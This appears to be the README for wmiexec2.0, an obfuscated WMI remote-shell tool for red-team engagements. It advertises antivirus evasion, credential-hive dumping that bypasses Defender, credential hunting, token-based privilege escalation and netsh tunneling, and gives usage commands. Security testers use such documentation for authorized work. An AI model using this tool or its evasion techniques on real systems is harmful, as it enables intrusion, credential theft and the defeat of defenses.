Wmiexec2
wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines. It also has a handful of additional built in modules to help automate some common tasks on Red team engagements.
Install / Use
/learn @ice-wzl/Wmiexec2README
⚡ wmiexec2.0 ⚡
The stealthy upgrade to everyone's favorite
wmiexec— obfuscated, enhanced, and red team ready.
💀 Bypass AV. Automate engagements. Dominate.
🚀 Features
- 🎭 Obfuscated to evade signature-based AV detection
- 🛠️ Built-in red team modules for rapid automation
- 🐚 Supports
cmdandpowershellshell types - 📁 Local and remote file transfer (
lput,lget) - 📡 Netsh tunneling, token abuse, VM detection, and more
📦 Installation
git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt
⚠️ Do NOT use
wgeton GitHub Raw — it will break emoji characters. Always usegit clone.
🧪 AV / EDR Compatibility
| Environment | Result | |-----------------------------------------------------|----------------------------| | Windows Server 2022 (Feb 2024 updates) | ✅ All modules working | | Windows 10 Pro, Defender v1.381.3595.0 | ✅ All modules working | | Windows 10 Pro, Kaspersky Standard 21.8.5 | ✅ All modules working | | Windows 8, Defender v1.383.35.0 | ✅ All modules working | | Windows 7 Pro, Defender v1.95.191.0 (2010) | ⚠️ Reg module not working |
🔧 Usage
python3 wmiexec2.py DOMAIN/USERNAME:PASSWORD@10.0.0.2 --shell-type powershell
python3 wmiexec2.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 --shell-type cmd
Supports both password and NTLM hash authentication
📚 Commands
| Command | Description |
|--------------------------|-------------------------------------------------------|
| help | Show available modules |
| lcd <path> | Change local working directory |
| exit | Exit shell |
| lput <src> <dst> | Upload file to target |
| lget <file> | Download file from target |
| !<command> | Run a command locally (e.g., !ls) |
| ls [path] | List target directory (uses dir /a) |
| cat <file> | Show remote file contents (alias for type) |
🧠 Modules
sysinfo
Display target user, hostname, IP, and architecture.
sysinfo
av
Lists common AV product processes via remote enumeration.
av
defender
Checks Defender installation, service status, exclusions, and tamper protection.
defender
vmcheck
Detects ESXi, VMware, QEMU, and VirtualBox environments.
vmcheck
unattend
Searches for unattended install config files that may contain credentials.
unattend
regrip
Dumps SAM, SECURITY, and SYSTEM hives (bypasses Defender as of 6/7/24).
regrip
loggrab
Download .evtx logs from remote system.
loggrab Security.evtx
tokens
Enumerates active tokens and suggests privesc paths.
tokens
survey / survey save
Run custom recon commands listed in survey.conf.
survey
survey save
Netsh Tunneling
addtun 10000 10.0.0.5 443
showtun
deltun 10000
🛠 Known impacket NAT Fix
If you get this error:
[-] Can't find a valid stringBinding to connect
➤ Fix
-
Locate your
dcomrt.py:find / -type f -name "dcomrt.py" 2>/dev/null -
Edit and replace:
# raise Exception("Can't find a valid stringBinding to connect") stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort) LOG.info("Can't find a valid stringBinding to connect, using default!")
✅ Done!
💡 Notes
- This tool is under active development — submit PRs or issues.
- All modules built for stealth and speed.
- Use responsibly in authorized engagements.
⭐ If This Helped You
If wmiexec2.0 saved you time or helped your ops:
🧠 Spread the knowledge. 🌍 Share the repo. ⭐ Star it.
👻 Author
ice-wzl
🐙 GitHub: ice-wzl
🛠️ Built with ❤️ for red teams.
